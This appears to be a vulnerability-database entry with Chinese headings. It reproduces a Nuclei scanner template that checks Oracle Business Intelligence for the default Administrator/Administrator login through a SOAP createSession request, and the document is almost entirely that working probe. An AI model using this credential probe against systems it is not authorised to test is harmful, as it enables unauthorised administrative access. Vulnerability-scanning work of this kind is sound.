漏洞描述
Oracle Business Intelligence default admin credentials were discovered.
oracle-business-intelligence-login: Oracle Business Intelligence Default Login
PoC代码[已公开]
id: oracle-business-intelligence-login
info:
name: Oracle Business Intelligence Default Login
author: milo2012
severity: high
description: Oracle Business Intelligence default admin credentials were discovered.
reference:
- https://docs.oracle.com/cd/E12096_01/books/AnyDeploy/AnyDeployMisc2.html
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L
cvss-score: 8.3
cwe-id: CWE-522
metadata:
max-request: 1
tags: oracle,default-login,vuln
http:
- raw:
- |
POST /xmlpserver/services/XMLPService HTTP/1.1
Host: {{Hostname}}
Content-Type: text/xml
SOAPAction: ""
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
<soapenv:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:rep="http://xmlns.oracle.com/oxp/service/report">
<soapenv:Header/>
<soapenv:Body>
<rep:createSession soapenv:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">
<username xsi:type="xsd:string">{{username}}</username>
<password xsi:type="xsd:string">{{password}}</password>
<domain xsi:type="xsd:string">bi</domain>
</rep:createSession>
</soapenv:Body>
</soapenv:Envelope>
payloads:
username:
- Administrator
password:
- Administrator
attack: pitchfork
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: word
words:
- 'createSessionReturn'
part: body
# digest: 490a00463044022003a6eb223573ec3fc12fb2179f2a991f0395c497454b9807a155fb30d45e807302203cf58185e2322e108a97e403883500d91428ab34d006bd3200ecf212f4f8fc23:922c64590222798bb761d5b6d8e72950